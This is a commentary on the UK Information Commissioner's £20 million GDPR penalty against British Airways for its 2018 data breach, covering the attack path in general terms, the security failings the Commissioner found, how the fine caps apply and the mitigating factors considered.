The Information Commissioner had originally served a Notice of Intent to fine BA £183.39 million. The final fine would have been £30 million but was reduced by 20% to £24 million to take account of mitigating factors, including later improvements to security and BA’s offer to reimburse any losses suffered by customers.
The fine was then further reduced to £20 million in light of the Commissioner’s Covid-19 related regulatory action policy amendments. The penalty notice was served on 16th October 2020. The breach affected nearly 430,000 data subjects and related to a security breach lasting from 22nd June to 5th September 2018.
Controllers must protect against attackers; anticipate attempts to breakout of Citrix environments; avoid storing passwords in plaintext; have processes in place to mitigate risks from accounts with privileged access rights; implement measures to detect unauthorised activity – including attempts to activate guest accounts in Windows and changes to website code; and have effective review processes for moving from a development to live environment
The breach involved access to stored credit card data and “skimming” of credit card data from BA’s website. The attacker used compromised credentials for an employee of Swissport, who had access rights to BA’s systems, to log into to BA’s systems. The attacker then broke-out of the Citrix environment accessible to the Swissport employee and accessed other BA systems. This included accessing usernames and passwords of privileged domain administrators and a system administrator. Using these credentials, the attacker exfiltrated credit card from BA’s systems in two ways. First, the attacker found a record of credit card details and CVV numbers stored in plaintext. This record had been inadvertently created when BA carried out testing on a new feature and did not decommission a debugging script when the feature went live. Second, the attacker “skimmed” credit card data from britishairways.com, by redirecting traffic to BAways.com. BA was notified of the redirection on 5th September 2018. It contained the vulnerability within 90 minutes of receiving notice and blocked the redirection within a further 20 minutes. In total, data relating to 429,612 individuals worldwide was affected, although not all of this included credit card data. Name, address, credit card and CVV number was exfiltrated for 244,000 individuals.
The Commissioner acknowledged that not every breach of security would amount to a breach of the GDPR and that she should not reason solely with the benefit of hindsight. Th; e penalty notice describes her role as to focus on whether the controller implemented adequate and appropriate security measures; what risks were known or could reasonably have been known at the time; and determining whether there was a failure to put appropriate measures in place.
The Commissioner found multiple failings:
- BA had failed to take appropriate measures to mitigatethe risk of an attacker being able to access its network. BA’s own network access policy stated that it should have deployed multi-factor authentication to mitigate this risk; while this was in place for access to most systems, it was missing here. Alternatively, the Commissioner said that BA could have ensured that access was only permitted by whitelisted public IP addresses or could have deployed an IPsec VPN.
- BA had failed to take appropriate measures to prevent unauthorised users from breaking out of the Citrix environment; the Commissioner referred to literature from Citrix to show that this was a known risk. The Commissioner suggested that BA could have deployed any of application whitelisting, denying access from blacklisted applications, or application or server hardening to achieve this objective.
- BA should not have stored passwords in plaintext: the measures suggested by the Commissioner included measures which, although they would not have prevented unauthorised access, would have allowed for earlier detection of the problem.
- Failings in the way BA managed its system administrator account – this part of the decision is heavily redacted.
- Failure to implement measures to prevent the attacker enabling a Guest Account in Windows – although Guest Accounts had been disabled, BA did not then monitor attempts to enable these accounts.
- Insufficient measures to detect unauthorised activity – in particular, insufficient activity logging.
- Failure to remove functions (here a debugging script) when BA moved from a development to production environment: BA did undertake a manual code review, but this was purely undertaken to check if code was operating as expected, there were not checks to ensure that additional, appropriate, security measures were in place.
- BA should have had monitoring systems in place which would have detected changes to its website code. Although this wouldn’t have prevented the redirection, it would have allowed earlier detection.
BA is facing group litigation in relation to the incident – and the findings of fault in the Commissioner’s monetary penalty notice will be helpful to the claimants there.
Breaches of security can trigger the higher, 4% fine – turnover is assessed by reference to the revenue of the controller responsible for the breach, not that of a parent company which is not the responsible controller
Readers who know their GDPR by heart will know that the obligation to implement appropriate technical and organisational measures is set out in Art. 32 GDPR – for which the maximum fine is 2% of worldwide turnover or €10 million, whichever is higher. However, the GDPR also refers to an obligation to implement appropriate security in Article 5(1)(f) – among the data protection principles applicable to controllers – for which the maximum fine is 4% or €20 million.
ICO found BA to be in breach of Article 5(1)(f) – thus allowing the higher cap to be applied (although the actual penalty imposed is, any event, within the lower amount).
BA is a subsidiary of International Consolidated Airlines Group S.A. ICO concluded that BA was the controller here and looked to the BA’s turnover in assessing the penalty, not the turnover of its parent.
Relevant factors in setting and reducing the fine
The final decision notice doesn’t explain how the Commissioner arrived at the revised figure of £30 million. The penalty notice shows that BA argued (unsuccessfully) that the lack of clear guidance from the Commissioner as to the amount of a penalty that would be imposed should prevent the Commissioner from being able to impose any penalty – or should restrict her to pre-GDPR levels.
Mitigating factors included later investment in better security, the fact that BA had detailed customer outreach, made information available swiftly via the press, that it engaged with card issuers and offered to reimburse losses
The Commissioner rejected arguments by BA that she relied too heavily on turnover to set the fine and that – by comparison with fines levied by other EEA authorities – this was too high. Unsurprisingly, she also rejected the argument from BA that security breaches involving credit card data are so commonplace that it was not credible for the Commissioner to assert, as a factor in setting the penalty, that cardholders would have suffered some distress. Readers may be interested to note that the Commissioner relied on an ENISA methodology to assess the severity of the breach.